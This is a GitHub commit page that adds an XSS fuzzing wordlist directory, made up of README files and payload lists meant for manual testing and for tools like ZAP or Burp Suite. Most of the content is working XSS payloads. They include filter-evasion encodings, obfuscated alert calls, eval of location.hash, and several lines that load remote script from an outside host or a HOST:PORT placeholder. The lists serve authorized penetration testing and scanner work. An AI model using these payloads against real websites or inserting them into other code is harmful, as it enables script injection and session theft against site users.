-
Notifications
You must be signed in to change notification settings - Fork 23.9k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #951 from molangning/patch-5
Fix of #40
- Loading branch information
Showing
22 changed files
with
9,535 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,8 @@ | ||
| # XSS | ||
| This is a directory for XSS wordlists. | ||
|
|
||
| They are for testing xss vulnerabilities manually or automatically using tools. The XSS wordlists are further split into two more categories, `human-friendly` and `robot-friendly`. | ||
|
|
||
| The `human-friendly` category is for manual testings and as such, have comments left untouched. | ||
|
|
||
| The `robot-friendly` is for automated tools like ZAP or burpsuite to use. Minor changes may be required and as such, you should look out for the `README.md` file in each of the directories to know what to change. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,11 @@ | ||
| # XSS Human-Friendly version | ||
|
|
||
| This directory contains XSS you can test for. For usage in tools, go to the [robot-friendly](../robot-friendly) directory. | ||
|
|
||
| There are some line you may need to change/take note in order for your testing process to go smoothly. (e.g. third party resources that may get flagged by WAF and the xss itself) | ||
|
|
||
| Some XSS trigger condition may require you to interact with the web pages to trigger it. You should read through all the wordlists here and understand what each XSS does, then customizing it to your own needs. | ||
|
|
||
| To see the results, look out for message popups or network activity in the devtools of your browser. | ||
|
|
||
| Happy hacking! |
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,13 @@ | ||
| # XSS Robot-Friendly version | ||
|
|
||
| This directory contains XSS you can test for. For human friendly versions, go to the [human-friendly](../human-friendly) directory. | ||
|
|
||
| There are some line you may need to change/take note in order for your testing process to go smoothly. (e.g. third party resources that may get flagged by WAF and the xss itself) | ||
|
|
||
| Some XSS trigger condition may require you to interact with the web pages to trigger it. You should read through all the wordlists here and understand what each XSS does, then customizing it to your own needs. | ||
|
|
||
| `XSS-Vectors-Mario.txt` and `XSS-With-Context-Jhaddix.txt` may not work as well as before because all XSS are squished into one line and may break some xss that relies on new lines. | ||
|
|
||
| To see the results, look out for message popups or network activity in the devtools of your browser. | ||
|
|
||
| Happy hacking! |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,113 @@ | ||
| <svg onload=alert(1)> | ||
| "><svg onload=alert(1)// | ||
| "onmouseover=alert(1)// | ||
| "autofocus/onfocus=alert(1)// | ||
| '-alert(1)-' | ||
| '-alert(1)// | ||
| \'-alert(1)// | ||
| </script><svg onload=alert(1)> | ||
| <x contenteditable onblur=alert(1)>lose focus! | ||
| <x onclick=alert(1)>click this! | ||
| <x oncopy=alert(1)>copy this! | ||
| <x oncontextmenu=alert(1)>right click this! | ||
| <x oncut=alert(1)>copy this! | ||
| <x ondblclick=alert(1)>double click this! | ||
| <x ondrag=alert(1)>drag this! | ||
| <x contenteditable onfocus=alert(1)>focus this! | ||
| <x contenteditable oninput=alert(1)>input here! | ||
| <x contenteditable onkeydown=alert(1)>press any key! | ||
| <x contenteditable onkeypress=alert(1)>press any key! | ||
| <x contenteditable onkeyup=alert(1)>press any key! | ||
| <x onmousedown=alert(1)>click this! | ||
| <x onmousemove=alert(1)>hover this! | ||
| <x onmouseout=alert(1)>hover this! | ||
| <x onmouseover=alert(1)>hover this! | ||
| <x onmouseup=alert(1)>click this! | ||
| <x contenteditable onpaste=alert(1)>paste here! | ||
| <script>alert(1)// | ||
| <script>alert(1)<!– | ||
| <script src=//brutelogic.com.br/1.js> | ||
| <script src=//3334957647/1> | ||
| %3Cx onxxx=alert(1) | ||
| <%78 onxxx=1 | ||
| <x %6Fnxxx=1 | ||
| <x o%6Exxx=1 | ||
| <x on%78xx=1 | ||
| <x onxxx%3D1 | ||
| <X onxxx=1 | ||
| <x OnXxx=1 | ||
| <X OnXxx=1 | ||
| <x onxxx=1 onxxx=1 | ||
| <x/onxxx=1 | ||
| <x%09onxxx=1 | ||
| <x%0Aonxxx=1 | ||
| <x%0Conxxx=1 | ||
| <x%0Donxxx=1 | ||
| <x%2Fonxxx=1 | ||
| <x 1='1'onxxx=1 | ||
| <x 1="1"onxxx=1 | ||
| <x </onxxx=1 | ||
| <x 1=">" onxxx=1 | ||
| <http://onxxx%3D1/ | ||
| <x onxxx=alert(1) 1=' | ||
| <svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)> | ||
| 'onload=alert(1)><svg/1=' | ||
| '>alert(1)</script><script/1=' | ||
| */alert(1)</script><script>/* | ||
| */alert(1)">'onload="/*<svg/1=' | ||
| `-alert(1)">'onload="`<svg/1=' | ||
| */</script>'>alert(1)/*<script/1=' | ||
| <script>alert(1)</script> | ||
| <script src=javascript:alert(1)> | ||
| <iframe src=javascript:alert(1)> | ||
| <embed src=javascript:alert(1)> | ||
| <a href=javascript:alert(1)>click | ||
| <math><brute href=javascript:alert(1)>click | ||
| <form action=javascript:alert(1)><input type=submit> | ||
| <isindex action=javascript:alert(1) type=submit value=click> | ||
| <form><button formaction=javascript:alert(1)>click | ||
| <form><input formaction=javascript:alert(1) type=submit value=click> | ||
| <form><input formaction=javascript:alert(1) type=image value=click> | ||
| <form><input formaction=javascript:alert(1) type=image src=SOURCE> | ||
| <isindex formaction=javascript:alert(1) type=submit value=click> | ||
| <object data=javascript:alert(1)> | ||
| <iframe srcdoc=<svg/onload=alert(1)>> | ||
| <svg><script xlink:href=data:,alert(1) /> | ||
| <math><brute xlink:href=javascript:alert(1)>click | ||
| <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> | ||
| <html ontouchstart=alert(1)> | ||
| <html ontouchend=alert(1)> | ||
| <html ontouchmove=alert(1)> | ||
| <html ontouchcancel=alert(1)> | ||
| <body onorientationchange=alert(1)> | ||
| "><img src=1 onerror=alert(1)>.gif | ||
| <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> | ||
| GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//; | ||
| <script src="data:,alert(1)// | ||
| "><script src=data:,alert(1)// | ||
| <script src="//brutelogic.com.br/1.js# | ||
| "><script src=//brutelogic.com.br/1.js# | ||
| <link rel=import href="data:text/html,<script>alert(1)</script> | ||
| "><link rel=import href=data:text/html,<script>alert(1)</script> | ||
| <base href=//0> | ||
| <script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1) | ||
| <body onload=alert(1)> | ||
| <body onpageshow=alert(1)> | ||
| <body onfocus=alert(1)> | ||
| <body onhashchange=alert(1)><a href=#x>click this!#x | ||
| <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x | ||
| <body onscroll=alert(1)><br><br><br><br> | ||
| <br><br><br><br><br><br><br><br><br><br> | ||
| <br><br><br><br><br><br><br><br><br><br> | ||
| <br><br><br><br><br><br><x id=x>#x | ||
| <body onresize=alert(1)>press F12! | ||
| <body onhelp=alert(1)>press F1! (MSIE) | ||
| <marquee onstart=alert(1)> | ||
| <marquee loop=1 width=0 onfinish=alert(1)> | ||
| <audio src onloadstart=alert(1)> | ||
| <video onloadstart=alert(1)><source> | ||
| <input autofocus onblur=alert(1)> | ||
| <keygen autofocus onfocus=alert(1)> | ||
| <form onsubmit=alert(1)><input type=submit> | ||
| <select onchange=alert(1)><option>1<option>2 | ||
| <menu id=x contextmenu=x onshow=alert(1)>right click me! |
17 changes: 17 additions & 0 deletions
17
Fuzzing/XSS/robot-friendly/XSS-Bypass-Strings-BruteLogic.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,17 @@ | ||
| alert`1` | ||
| alert(1) | ||
| alert(1) | ||
| alert(1) | ||
| (alert)(1) | ||
| a=alert,a(1) | ||
| [1].find(alert) | ||
| top["al"+"ert"](1) | ||
| top[/al/.source+/ert/.source](1) | ||
| al\u0065rt(1) | ||
| top['al\145rt'](1) | ||
| top['al\x65rt'](1) | ||
| top[8680439..toString(30)](1) | ||
| navigator.vibrate(500) | ||
| eval(URL.slice(-8))>#alert(1) | ||
| eval(location.hash.slice(1)>#alert(1) | ||
| innerHTML=location.hash>#<script>alert(1)</script> |
Oops, something went wrong.